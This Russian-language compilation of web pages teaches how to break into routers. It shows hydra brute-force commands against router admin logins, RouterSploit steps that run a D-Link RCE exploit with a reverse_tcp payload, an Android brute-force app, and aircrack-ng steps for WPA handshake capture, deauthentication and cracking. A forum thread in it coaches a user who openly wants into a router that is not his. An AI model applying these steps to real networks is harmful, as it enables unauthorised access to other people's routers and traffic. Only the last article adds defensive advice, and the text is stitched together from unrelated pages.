Взлом пароля админа к роутеру

Взлом «админки» роутера

Время на прочтение
4 мин

Количество просмотров 274K

*Здесь могло быть предупреждение о том, что не нужно пользоваться данной программой в преступных целях, но hydra это пишет перед каждым сеансом взлома*

image

В общем, решил я по своим нуждам покопаться в настройках роутера, вбиваю я всем знакомый адрес, а тут пароль спрашивают. Как быть? Ну, начал я перебирать пароли, а их количество слишком большое, что бы перебирать все и слишком маленькое, чтобы делать reset.

И я открыл google. После пары запросов я узнал о такой вещи как hydra. И тут началось: жажда открытий, поиски неизведанного и так далее.

Приступим

Первым делом мной был составлен словарь паролей, ни много, ни мало, аж на 25 комбинаций. Далее качаем либо Kali linux, либо саму Гидру (если

вы пингвин

у вас линукс). Теперь у нас два варианта (ну как два, я нашел информацию по двум вариантам).

Либо у вас вот такое диалоговое окно:

image

Либо логин и пароль запрашивает форма на сайте. Мой вариант первый, поэтому начнем с него. На нашем пути к «админке» стоит страж в виде диалогового окна. Это вид авторизации http-get.

Открываем терминал. Вводим:

hydra -l admin -P myPass.txt -s 80 192.168.1.1 http-get /

Где после «-l» идет логин, после «-P» словарь, после «-s» порт. Также в нашем распоряжении есть другие флаги:

-R восстановить предыдущую прерванную/оборванную сессию

-S выполнить SSL соединение

-s ПОРТ если служба не на порту по умолчанию, то можно задать порт здесь

-l ЛОГИН или -L ФАЙЛ с ЛОГИНАМИ (именами), или загрузить несколько логинов из ФАЙЛА

-p ПАРОЛЬ или -P ФАЙЛ с паролями для перебора, или загрузить несколько паролей из ФАЙЛА

-x МИНИМУМ: МАКСИМУМ: НАБОР_СИМВОЛОВ генерация паролей для брутфорса, наберите «-x -h» для помощи

-e nsr «n» — пробовать с пустым паролем, «s» — логин в качестве пароля и/или «r» — реверс учётных данных

-u зацикливаться на пользователя, а не на парлях (эффективно! подразумевается с использованием опции -x)

-C ФАЙЛ формат где «логин: пароль» разделены двоеточиями, вместо опции -L/-P

-M ФАЙЛ список серверов для атак, одна запись на строку, после двоеточия ‘:’ можно задать порт

-o ФАЙЛ записывать найденные пары логин/пароль в ФАЙЛ вместо стандартного вывода

-f / -F выйти, когда пара логин/пароль подобрана (-M: -f для хоста, -F глобально)

-t ЗАДАЧИ количество запущенных параллельно ЗАДАЧ (на хост, по умолчанию: 16)

-w / -W ВРЕМЯ время ожидания ответов (32 секунды) / между соединениями на поток
-4 / -6 предпочитать IPv4 (по умолчанию) или IPv6 адреса

-v / -V / -d вербальный режим / показывать логин+пароль для каждой попытки / режим отладки

-q не печатать сообщения об ошибках соединения

-U подробные сведения об использовании модуля
server цель: DNS, IP или 192.168.0.0/24 (эта ИЛИ опция -M)
service служба для взлома (смотрите список поддерживаемых протоколов)
OPT некоторые модули служб поддерживают дополнительный ввод (-U для справки по модулю)

Ну вот так как-то:

image

Второй вариант:

Не мой, честно взят с Античата, с исправлением грамматических ошибок автора (Обилие знаков пунктуации я оставил). Интересно это можно считать переводом?

Нас встречает форма на сайте:

image

Такой метод авторизации — http-post-form, и тут нужно немного повозится, так как нам нужно понять, как браузер отправляет роутеру данные.

В данном случае и использовал браузер Chrome (его аналог Chromium в Kali Linux, ставится через apt-get install chromium).

Сейчас нужно сделать одну очень глупую вещь… указать неверный логин и пасс…
для чего увидим позже…

Нажимаем F12 что бы перейти в режим редактирования веб-страницы.

image

Переходим в Network → Включаем галочку Preserv log.

image

Вводим ложные логин и пароль…

image

Ну что за дела? Так не пойдет! Более того, после нескольких неудачных попыток входа, форма блокируется на 180 секунд.

Переходим во вкладочку HEADERS ищем строку:

 Request URL:http://192.168.0.1/index.cgi

Отрезаем все до ip-адреса — /index.cgi… Поздравляю мы нашли первую часть скрипта авторизации… Идем дальше… Переходим к вкладке FORM DATA и изменяем режим отображения на VIEV SOURCE.

image

image

update_login=login&update_password=password&check_auth=y&tokenget=1300&
update_login=login&update_password=password 

Бинго! Мы нашли вторую часть скрипта авторизации! Еще чуть-чуть! теперь нужно найти страницу с сообщением об ошибке… Нужно нажать на вкладку ELEMENTS.

image

И выбрать элемент HTML кода (CTRL+SHIFT+C) и выбрать окно с сообщением об ошибки… в данном случае — Authentication failed!

image

<span langkey="bad_auth" style="display: inline;">Authentication failed!</span>

Выбираем:

span langkey="bad_auth"

и немножко правим… bad_auth — все! Ключ практически у нас в кармане… Теперь мы можем полностью написать строку авторизации:

index.cgi:update_login=login&update_password=password:bad_auth 

Теперь нужно подставить вместо «login» — ^USER^ и вместо «password» ^PASS^ и тогда строка будет иметь вид:

index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth 

Вводим команду:

hydra -l admin -P router-pass.dic -t 1 -e nsr -vV -f -s 80 192.168.0.1 http-post-form "/index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth"

Обратите внимание что между частями скрипта двоеточие! это обязательно! Кстати, блокировки формы через гидру не происходило… Это очень радует.

image

В работоспособности второго метода мне убедиться не светит, так как я не обладатель подходящей модели роутера. Придется довериться экспрессивному человеку с Античата.

Если кому интересно, будьте добры, проверьте и отпишитесь в комментариях. Я работал с роутером TL-WR1043N/TL-WR1043ND. Роутер с Античата — D-link300NRU.

Спасибо за внимание!

Valkiria


  • #2

Обойти авторизацию ?
Ты имеешь ввиду, что окно автризации не должно показываться и беспокоить тебя своим присутствием ?
Ты хочешь войти в WEB-интерфейс роутера точно так-же как на любой публичный сайт ?

Tayrus


  • #3

Обойти авторизацию ?
Ты имеешь ввиду, что окно автризации не должно показываться и беспокоить тебя своим присутствием ?
Ты хочешь войти в WEB-интерфейс роутера точно так-же как на любой публичный сайт ?

Веб морду, т.e у меня

Ссылка скрыта от гостей

, мы туда заходим и нас просят логин:пароль чтобы войти туда, пароль я не знаю

Valkiria


  • #4

Ответ на твой вопрос невозможно дать однозначно.
Это твой роутер или тебе нужно порлучить доступ на чужой ?
Имеешь ли ты физический доступ к роутеру ?
Если роутер чужой и удалённый, то какие меры были предприняты для взлома ?

Вот от этих ответов во многом зависит ответ на твой первостепенный вопрос.

Tayrus


  • #5

Ответ на твой вопрос невозможно дать однозначно.
Это твой роутер или тебе нужно порлучить доступ на чужой ?
Имеешь ли ты физический доступ к роутеру ?
Если роутер чужой и удалённый, то какие меры были предприняты для взлома ?

Вот от этих ответов во многом зависит ответ на твой первостепенный вопрос.

Нет не мой(Все в рамках закона))) физ.доступ не имею, через WPS хекнул

Valkiria


  • #6

Если ты имеешь доступ к роутеру только через Интернет, то пробуй брутфорсить программой Hydra или Patator.
Если ты находишься в радиусе действия Wi-Fi этого роутера, то пробуй взломать соответственно через Wi-Fi.

Tayrus


  • #7

Если ты имеешь доступ к роутеру только через Интернет, то пробуй брутфорсить программой Hydra или Patator.
Если ты находишься в радиусе действия Wi-Fi этого роутера, то пробуй взломать соответственно через Wi-Fi.

У меня есть пароль от сетки, брутфорс тут увы не поможет, «пробуй взломать соответственно через Wi-Fi» как это можно осуществить?

Valkiria


  • #8

О взломе роутеров через Wi-Fi написаны терабайты информации.
Тебе нужно немного подтянуть теорию )

Tayrus


  • #9

О взломе роутеров через Wi-Fi написаны терабайты информации.
Тебе нужно немного подтянуть теорию )

Я знаю только о существовании сайта routerpwn.com, помогите если не сложно, дайте ссылки на информацию(гуглом пользоваться я умею, увы не нашёл, может слепой/)

  • #10

Я знаю только о существовании сайта routerpwn.com, помогите если не сложно, дайте ссылки на информацию(гуглом пользоваться я умею, увы не нашёл, может слепой/)

vzlom-wi-fi
https://codeby.net/category/vzlom-wifi/

Valkiria


  • #11

Я знаю только о существовании сайта routerpwn.com, помогите если не сложно, дайте ссылки на информацию(гуглом пользоваться я умею, увы не нашёл, может слепой/)

Чтобы хоть как-то помочь тебе советом, ты ДОЛЖЕН обрисовать ситуацию до мелочей.
А я всю эту тему тем и занималась, что вытягивала по крупицам хоть что-то ))
У меня уже пальцы в мозолях от твоей тугодумности.

Может быть тебе проще спросить пароль у владельца роутера ?

Remir


  • #12

гуглом пользоваться я умею, увы не нашёл

И как же ты искал, если за запрос тут же выходит куча ответов?

Ссылка скрыта от гостей

И зачем лезть куда-то, когда здесь это информации хоть отбавляй! Подсказываю: тут есть такая кнопочка и называется она «Поиск».

11.JPG

Введи туда «взлом роутера» и получишь

https://codeby.net/search/108310/?q=взлом+роутера&o=relevance

Tayrus


  • #13

Чтобы хоть как-то помочь тебе советом, ты ДОЛЖЕН обрисовать ситуацию до мелочей.
А я всю эту тему тем и занималась, что вытягивала по крупицам хоть что-то ))
У меня уже пальцы в мозолях от твоей тугодумности.

Может быть тебе проще спросить пароль у владельца роутера ?

Хорошо опишу все, у меня стоит задача получить контроль над роутером, т.е web интерфейс его(роутера) получить, чтобы я мог что-то изменить(ну к примеру перепрошить, пароль поменять и т.п) и так я получил пароль от сети и при подключении к 191.168.1.1 просит логин;пароль, стандартные все попробовал неудача, зайти в зону wi fi я могу(ну где роутер) я могу его даже увидеть, но физически контактировать никак, производитель Tp-Link, модель не знаю надеюсь теперь тебе понятна картина.
[doublepost=1513017854,1513017459][/doublepost]

И как же ты искал, если за запрос тут же выходит куча ответов?
***Скрытый текст***’]

Ссылка скрыта от гостей

роутера через wifi[/URL]

И зачем лезть куда-то, когда здесь это информации хоть отбавляй! Подсказываю: тут есть такая кнопочка и называется она «Поиск».

Посмотреть вложение 13803

Введи туда «взлом роутера» и получишь

https://codeby.net/search/108310/?q=взлом+роутера&o=relevance

Мне это ничем не помогло

Remir


  • #14

За 7 минут успел все прочитать? Ух ты! Молодчина!

Извини, но тогда, пожалуй, тебе никто не поможет. :)

Valkiria


  • #15

Мне кажется, что тебе может помочь вот такая уязвимость этой модели.

Ссылка скрыта от гостей

Tayrus


  • #16

Мне кажется, что тебе может помочь вот такая уязвимость этой модели.

Ссылка скрыта от гостей

Спасибо, завтра попробую
[doublepost=1513018512,1513018478][/doublepost]

За 7 минут успел все прочитать? Ух ты! Молодчина!

Извини, но тогда, пожалуй, тебе никто не поможет. :)

По оглавлении читал, что соответствовало моей проблеме читал

Dr.Lafa


kot-gor


  • #18

Добрый вечер.
Какие в роутере открыты порты? Вы сканировали роутер на сервисы?

g0llum


Rollly


  • #20

Дай ip роутера, попробуй эксплоитом пробить.

Взлом админ панели Wi-Fi роутера

Termux, please

Все действия мы будем производить с помощью Termux. Для взлома роутеров есть подобная программа — «RouterSploit». Она также, как и Metasploit, позволяет эксплуатировать уязвимости, но только у Wi-Fi роутеров.

Прежде чем устанавливать и запускать RouterSploit нужно прописать следующие команды:

apt update & upgrade
apt install git
apt install bash
apt install python
pip install futureapt
apt install git figletgit
git clone https://github.com/41Team/RoutersploitTermux

Переходим в папку RoutersploitTermux командой:

cd RoutersploitTermux

Запускаем процесс установки:

bash run.sh

По окончанию, появится такое сообщение:

[​IMG]

Процесс установки занимает довольно продолжительное время, примерно 20-30 минут.

Давайте же запустим наш RouterSploit и протестируем его:

ls
cd routersploit
python rsf.py

После запуска появится следующее:

[​IMG]

Данная программа содержит множество эксплойтов для разных моделей роутеров: D-Link, TP-Link, Huawei, Cisco и т.д. Список всех содержащихся эксплойтов можно посмотреть, прописав команду:

show all

Чтобы проверить, можно ли с помощью какого-либо из имеющихся эксплойтов взломать роутер, пишем:

use scanners/autopwn
set target <ip роутера>, например set target 192.168.1.1
exploit

Если же роутер содержит ту или иную уязвимость, Вы увидите следующее:

Чтобы применить эксплойт прописываем:

use exploits/router/dlink/dsl_2750b_rce
set target <ip роутера>
check
run
set payload reverse_tcp
set lhost <Ваш IP>
run

После этого появится сообщение, Взлом прошел успешно.

Конец!

Спасибо за прочтение!

  • ✅Основной канал — https://t.me/under_public
  • 🏴‍☠️ Приватный канал — https://t.me/joinchat/AAAAAEmM-bkL9Pv7KLyL7w
  • 🛒HackAli — cамые интересные хакерские товары с Aliexpress!
  • 👨‍💻Termux, please — 100% termux
  • 🐧Linux, please — всё о Linux
  • 🌐TG-канал форума: https://t.me/darksploit0x41
  • Наш форум: https://darksploit.su/
  • Чат — https://t.me/UnderChats

Также вы можете присылать ваши статьи в бота (оформляйте в телеграфе), я их просмотрю, если всё ОК — опубликую статью на канале с указанием автора.

Рассмотрим следующую ситуацию – домашний или офисный роутер был настроен, но пароль на web-интерфейс поменяли и не могут его вспомнить. Сразу приходит на ум, что нужно выполнить аппаратный сброс и затем настроить все заново. Но есть более хитрый способ – пароль на админку, если он неизвестен или его забыли, можно подобрать. Не всегда эта операция будет завершаться успешно, но попробовать ее провести смысл есть. Тем более, если под рукой находится устройство с Android, на которое Вы установите приложение router brute force, которое поможет подобрать пароль за пару минут.

Смартфон, планшет и роутер

Как подключиться к роутеру

Сразу отметим, что рассматриваемое приложение не является софтом, предназначенным для хакерства, и вообще отношения к так называемому «хакерству» оно не имеет. Чтобы пользоваться возможностями программы, надо зайти в сеть роутера, а если она защищена паролем, его значение требуется знать. Речь идет о том, чтобы подобрать пароль на админку устройства, не более. Нельзя будет даже угадать логин администратора (обычно используется слово admin, но есть множество исключений). Если Вы подключились к Wi-Fi-сети роутера, сначала скачайте apk-файл с рассматриваемым приложением и выполните установку. Впрочем, расскажем об этом по порядку.

Инструкция по использованию приложения

У программки, о которой мы говорим, есть официальный сайт. С него как раз и надо скачивать установочный файл apk. Дополнительные файлы (кэш) не требуются. Сайт расположен по следующему адресу: http://android-router-brute-force.blogspot.ru/, где надо прокрутить страницу вниз и щелкнуть ссылку для скачивания. Файл занимает меньше мегабайта, так что много трафика Вы не истратите. В настоящий момент актуальной версией программы является «2.8».

Действия после установки программы

Допустим, apk-файл был скачан и приложение успешно установилось. Щелкните по иконке с надписью «Router Brute Force», которая будет находиться в папке приложений. Возникнет следующий экран:

Приложение router brute force

Стартовый скриншот рассматриваемой программы

Как видите, IP-адрес роутера уже угадан. Сначала лучше нажать кнопку «Проверка», что поможет выяснить, используется ли web-интерфейсом стандартная аутентификация HTTP. Рассмотрим, как поступить дальше.

Если появится надпись «ссылка не использует…», проверьте, что адрес был подобран программой верно. При необходимости здесь можно поменять значение вручную. Некоторые роутеры действительно используют нестандартные алгоритмы во время проведения аутентификации, и тут уж ничего не поделать – в программе предусмотрен только стандартный метод. Обычно при входе через браузер появляется окошко с паролем, и такой вариант говорит о том, что протокол аутентификации является стандартным.

Если проверка завершилась без выдачи тревожных сообщений, нажимайте «Пуск». Начнется перебор значений, который идет достаточно быстро (в несколько раз быстрее, чем с использованием клавиатуры и компьютера). Просто, немного подождите:

Сканирование

Подбор пароля программой RBF

Ждать придется недолго, но и результат Вас обрадует вряд ли. Всего 398 типичных последовательностей – не совсем то, что требуется на практике. Если же результат окажется положительным, экран будет выглядеть так:

Положительный исход

Подобран пароль администратора: admin123

Сейчас мы рассмотрим, как подключить к программе дополнительные словари.

Куда сохранять файл словаря

Как Вы уже поняли, программа осуществляет перебор паролей, которые записаны в текстовом файле. Формат файла выглядит так:

Пароль
Пароль_1
Пароль_2

То есть, Вы вписываете в строку значение, нажимаете Enter и переходите к следующей строке. Файл словаря можно создать самому.

Теперь рассмотрим, как поступить, если готовый файл с паролями у Вас уже есть. В корневой директории смартфона будет расположена папка с таким названием: «Router Brute Force». В ней должен быть файл «dict_rbf.txt». А самодельный txt-файл нужно поместить в эту же папку, и больше ничего не потребуется. Когда папка содержит больше одного словаря, под кнопочкой «Файл» появляется название одного из них:

dict_rbf.txt

Имя активного файла-словаря

Выполнив клик по выделенному кружку селектора, Вы получите возможность задействовать другой файл, отличный от dict_rbf.

Как видим, программа позволяет:

  • Использовать готовый словарь, содержащий стандартные значения пароля
  • Устанавливать и использовать сколько угодно «пользовательских» словарей
  • Также, можно добавить несколько значений через запятую, нажав кнопку «Выборочно» («Specific»).

На самом деле, положительный результат гарантируется не всегда, ну а приемлемым вариантом является файл, содержащий 10 000 паролей. Кстати, скорость перебора зависит и от типа используемого протокола (B, G, N), и от уровня сигнала. Подойдите поближе к роутеру, этого будет достаточно.

Пользуясь рассмотренной программой, необходимо помнить о том, что логин на web-интерфейс может отличаться от слова admin.

Если это так, то потребуется выяснить, какой логин используется в действительности. Некоторые роутеры различают большие и маленькие буквы, на что тоже нужно обращать внимание. Теперь рассмотрим, что известно о скорости подбора пароля. 200 значений стандартный роутер проглатывает за 11 секунд (если Wi-Fi работает по протоколу 54G). От количества значений время перебора зависит линейно, а значит, на 10 000 слов понадобится 550 секунд, что не так много.

Работа программы на практике

Предыдущая

TrendnetIP-резервирование в роутерах Trendnet

Следующая

AcorpСравниваем современные роутеры

#статьи


  • 0

Показываем, как взломать ваш роутер за 2–3 часа. Будьте бдительны!

Редакция «Код» Skillbox Media

Онлайн-журнал для тех, кто влюблён в код и информационные технологии. Пишем для айтишников и об айтишниках.

В многоквартирных домах теснятся не только люди, но и множество маршрутизаторов. Получить доступ к соседскому Wi-Fi проще простого — достаточно знать пароль устройства. Обычные пользователи даже не догадываются, что у них проблемы с безопасностью и их роутеры прямо сейчас атакуют главную страницу «Яндекса».

Чтобы защититься от злоумышленников, нужно думать как злоумышленник. Поэтому попробуем взломать Wi-Fi. Практиковаться будем на своём роутере — мы же против нарушения законов! Попросите домашних изменить на нём пароль и не говорить вам.

Готово? Теперь у вас есть мотивация, цель и подробная инструкция.

Что нужно уметь?

  1. Установить Linux и работать с ОС на уровне рядового пользователя.
  2. Запускать терминал и выполнять простейшие команды.

Инструменты

  1. Kali Linux. Подойдёт любой дистрибутив Linux, но на Kali предустановлен необходимый софт.
  2. Wi-Fi-адаптер. Встроенный или внешний USB — разницы нет. Но есть нюансы, о которых поговорим далее.
  3. Aircrack-ng. Набор утилит для обнаружения Wi-Fi-сетей, анализа и перехвата трафика. Идёт в поставке Kali Linux.

Прежде чем надевать на голову чулок или балаклаву, нужно понять, как работает роутер. Для этого нужно немного вспомнить курс школьной физики. Беспроводной девайс ловит электромагнитные волны от ноутбука или смартфона, расшифровывает их, а полученные запросы отправляет в интернет через кабель.

Но чтобы обмениваться с роутером информацией, его надо как-то обнаружить — он же не кричит о себе на весь дом. Тут поможет… бекон.

Beacon frame — это пакет, который роутер рассылает, чтобы сообщить о себе. Смартфоны и другие пользовательские устройства периодически сканируют радиоканал и ловят «беконы». Они переключаются в режим монитора и выводят обнаруженные пакеты — это и есть доступные точки подключения.

После того как устройство обнаружило роутер, подключаемся. Давайте заглянем в этот процесс и познакомимся с терминами. Будем считать, что подключаемся через смартфон.

Если наш смартфон знает пароль, то передаёт его автоматически, если нет — роутер спрашивает его у нас. Во время подключения смартфон и роутер обмениваются «рукопожатием» (handshake).

Handshake — процесс знакомства клиента и сервера, во время которого устройства идентифицируют друг друга и обмениваются секретными ключами. Handshake происходит каждый раз, когда мы подключаемся к серверу.

После «рукопожатия» смартфон переключается на рабочий канал и безопасно работает с роутером.

Канал — рабочая частота, на которой устройства обмениваются данными. У роутеров обычно от 1 до 15 каналов.

Теперь устройства доверяют друг другу, а у вас есть доступ в интернет.

Составим план взлома. Мы получим доступ к маршрутизатору в четыре шага:

  1. Найдём устройства с помощью Aircrack-ng.
  2. Выберем роутер и послушаем его трафик в ожидании handshake. Защита промышленных моделей наподобие Cisco, MikroTik может быть гораздо серьёзнее, и выполнить трюк будет сложнее.
  3. Возможно, дополнительно отправим сигнал отключения от точки для клиентских устройств, чтобы ускорить процесс.
  4. Перехватим handshake, расшифруем методом брутфорса и получим пароль.

Брутфорс — метод простого перебора паролей. Он примитивен и работает в лоб, поэтому и называется методом грубой силы. Это как если бы человек загадал трёхзначное число, а вы бы пытались его угадать, называя все числа от 100 до 999.

Плюсы нашей атаки:

  • роутер со стандартными настройками — лёгкая цель;
  • довольно простая реализация.

Минусы:

  • Перебор возможных паролей может занять много времени — его количество зависит от мощности машины и длины словаря. В среднем на пароль из 8 цифр уходит более 8 часов.
  • Если точкой никто не пользуется, то и handshake перехватить не получится: нет подключений, а значит, и нужных нам данных.

Не все адаптеры годятся для нашего плана. Нам нужен такой, у которого есть режим монитора и режим инъекции. Это аппаратные методы для одновременного анализа всех точек вокруг и перехвата чужих пакетов информации. Чтобы узнать, поддерживает ли ваше устройство такие режимы, нужно определить модель чипсета. Её можно найти в интернете по модели адаптера или с помощью команд:

  • lspci | grep «Network» — для встроенных адаптеров;
  • lsusb — для внешних устройств.

По названию ищем в поисковике информацию о чипсете. Нам нужно найти, поддерживает ли он monitor mode и packet injection.

Можно сразу искать чипсет на сайте, но там может не быть нужных данных.

Нам нужно узнать, как в системе именуется наше Wi-Fi-устройство. Запускаем терминал нажатием клавиш Ctrl + Alt + T и выполняем команду iwconfig для просмотра всех беспроводных адаптеров.

В моём случае найдено два устройства: wlx1cbfce4e2375 — внешний USB-адаптер и Wlp10s0 — встроенный.Чтобы проверить, способно ли устройство участвовать в атаке, нужно узнать его название. Встроенное — Realtek Semiconductor Co., Ltd. RTL8821CE — не поддерживает режим монитора и инъекции. А внешнее Ralink Technology, Corp. MT7601U Wireless Adapter — поддерживает. Его и будем использовать.

Нам необходимо переключить адаптер в режим монитора, в котором устройство анализирует весь беспроводной трафик вокруг себя.

Используем следующие команды:

sudo airmon-ng check kill

sudo airmon-ng start wlan0

Что делают:

  1. Выключают процессы, которые мешают работе с адаптером беспроводной сети.
  2. Включают режим монитора.

При запуске режима монитора утилита обнаружила, что моя карта заблокирована, и предложила выполнить команду для разблокировки. Выполняем команду.

Далее она автоматически переименовала длинное и странное имя адаптера в более простое. Теперь моя сеть мониторинга называется wlan0mon.

Нужно осмотреться! Запускаем утилиту Airodump-ng и мониторим сети.

sudo airodump-ng wlan0mon

Сверху у нас подробная таблица с точками доступа, а внизу — клиенты. Наша сеть — TP-Link_77D0, из таблицы узнаём её BSSID и CH-канал.

Переключаем наш адаптер в режим работы с этой точкой. Теперь утилита анализирует трафик точки и её клиентов. Лучше открыть дополнительный терминал для этих целей.

sudo airodump-ng wlan0 —channel 1 -w mycap

С помощью команды переключаем адаптер на канал 1. В случае поимки handshake данные сохраняются в файл с названием mycap. Он находится в папке, в которой запущен терминал.

Можно ничего не делать и ждать, когда рыба сама клюнет. Как только захватим handshake, сообщение «fixed channel wlan0:» сменится на «WPA handshake B0:BE: 76:A9:77:D0».

Чтобы ускорить процесс, можно подкинуть «наживки». Клиенты, подключенные к точке, могут отключиться, если мы отправим им соответствующий сигнал — пакет деаутентификации. Это вынудит клиента вновь обменяться handshake с атакуемым устройством.

Пакеты деаутентификации используются для исправления ошибок, обновления ключей и так далее. Они передаются незашифрованными, поэтому утилита может их подделать. Когда целевое устройство получит пакет деаутентификации, оно вынуждено отключиться от роутера.

С помощью команды отправляем 100 пакетов всем клиентам указанной сети.

sudo aireplay-ng -0 100 -a B0:BE: 76:A9:77:D0 wlan0

«-0» — это пакет деаутентификации, «100» — количество пакетов, «-a» — цель атаки, а «wlan0mon» — наш монитор.

И, вуаля, мы поймали рыбку! Зашифрованный пароль теперь в файле mycap.cap. Об этом говорит надпись «WPA handshake B0:BE: 76:A9:77:D0» в левом верхнем углу.

Пароль уже почти у нас. Осталось расшифровать полученный handshake. Сделать это несложно, но ресурсозатратно. Брутфорс требует больших мощностей и много времени.

Тут есть два пути.

Простой. Воспользоваться сайтами, которые расшифровывают данные. Их можно найти в поисковике по запросу «handshake decrypt online». У некоторых сервисов есть бесплатные тарифы, но обычно они берут небольшую сумму — выходит не дороже чашки кофе.

Сложный. Использовать специальный софт и подключать драйвера, которые будут использовать центральный процессор вместе с графическим для ускорения вычислений. Можно воспользоваться aircrack-ng — у неё есть модуль для расшифровки — или утилитой hashcat. Первая утилита содержит базовый набор функций, вторая — более серьёзный и расширенный.

Мы реализовали простую атаку на домашний роутер. Самое главное: мы научились не только взламывать чужие устройства, но и защищать свои:

  1. Не используйте стандартные слабые пароли. Для пароля из 8 цифр количество возможных комбинаций равно 134217728. Мощный компьютер расшифрует его довольно быстро. Но если добавить хотя бы одну латинскую букву, то количество вариантов возрастёт до 1.0633823966279327e+37, а шансы злоумышленников резко уменьшатся.
  2. Не использовать название модели роутера в имени сети. Зная модель роутера, злоумышленник может воспользоваться известными уязвимостями устройства. Например, для роутера TP-Link TL-WR840N есть эксплойт, позволяющий обойти аутентификацию. Кроме того, если вы не меняли пароль, взломщик может выяснить, какие заводские пароли использует роутер.
  3. Отключать обнаружение сети. Подключиться к такому устройству сложнее — придётся прописывать настройки вручную.
  4. Использовать фильтр подключений в роутере, который разрешает подключаться только известным устройствам. Даже если злоумышленник расшифрует пароль, фильтр не пропустит его в сеть.

Если хотите научиться защищать от хакерских атак не только домашние, но большие корпоративные сети, приходите на курс. «Специалист по кибербезопасности». Здесь студенты узнают о новых способах атак, учатся строить защиту, а лучшим мы помогаем с трудоустройством.

Жизнь можно сделать лучше!
Освойте востребованную профессию, зарабатывайте больше и получайте от работы удовольствие. А мы поможем с трудоустройством и важными для работодателей навыками.

Посмотреть курсы

  • Взять роутер в аренду ттк
  • Вещание ssid что это такое на роутере
  • Ввел неправильно пароль от роутера
  • Взлом wifi сети wifi роутера
  • Весь мтс супер аренда роутера